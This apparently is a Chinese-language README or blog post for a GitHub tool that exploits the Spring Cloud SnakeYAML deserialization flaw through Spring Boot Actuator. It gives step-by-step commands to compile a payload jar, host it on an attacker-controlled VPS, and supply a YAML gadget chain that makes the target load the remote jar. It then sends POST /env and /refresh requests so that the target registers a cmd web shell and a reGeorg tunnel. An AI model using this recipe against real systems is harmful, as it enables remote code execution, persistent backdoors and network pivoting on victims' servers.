使用Spring Cloud SnakeYAML的反序列化漏洞一键注册cmd shell和reGeorg
https://github.com/Y4er/yaml-payload
Spring Cloud SnakeYAML 一键注册cmd shell和reGeorg
利用条件:
/env
接口设置属性/refresh
接口刷新配置(存在 spring-boot-starter-actuator
依赖)spring-cloud-starter
版本 < 1.3.0.RELEASE仅在JDK1.8及Spring1.x测试通过,其他版本自测.
利用方法如下:
cd yaml-payload
javac src/artsploit/AwesomeScriptEngineFactory.java -cp ./lib
javac src/artsploit/Tunnel.java -cp ./lib
javac src/artsploit/GameInfo.java -cp ./lib
jar -cvf yaml-payload.jar -C src/ .
在自己控制的vps
机器上开启一个简单HTTP
服务器,端口尽量使用常见HTTP
服务端口(80、443)
# 使用 python 快速开启 http server
python2 -m SimpleHTTPServer 80
python3 -m http.server 80
在网站根目录下放置后缀为yml
的文件yaml-payload.yml
,内容如下:
!!javax.script.ScriptEngineManager [
!!java.net.URLClassLoader [[
!!java.net.URL ["http://your-vps-ip/yaml-payload.jar"]
]]
]
在网站根目录下放置打包好的yaml-payload.jar
spring.cloud.bootstrap.location
属性POST /env
Content-Type: application/x-www-form-urlencoded
spring.cloud.bootstrap.location=http://your-vps-ip/yaml-payload.yml
POST /refresh
Content-Type: application/x-www-form-urlencoded
文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。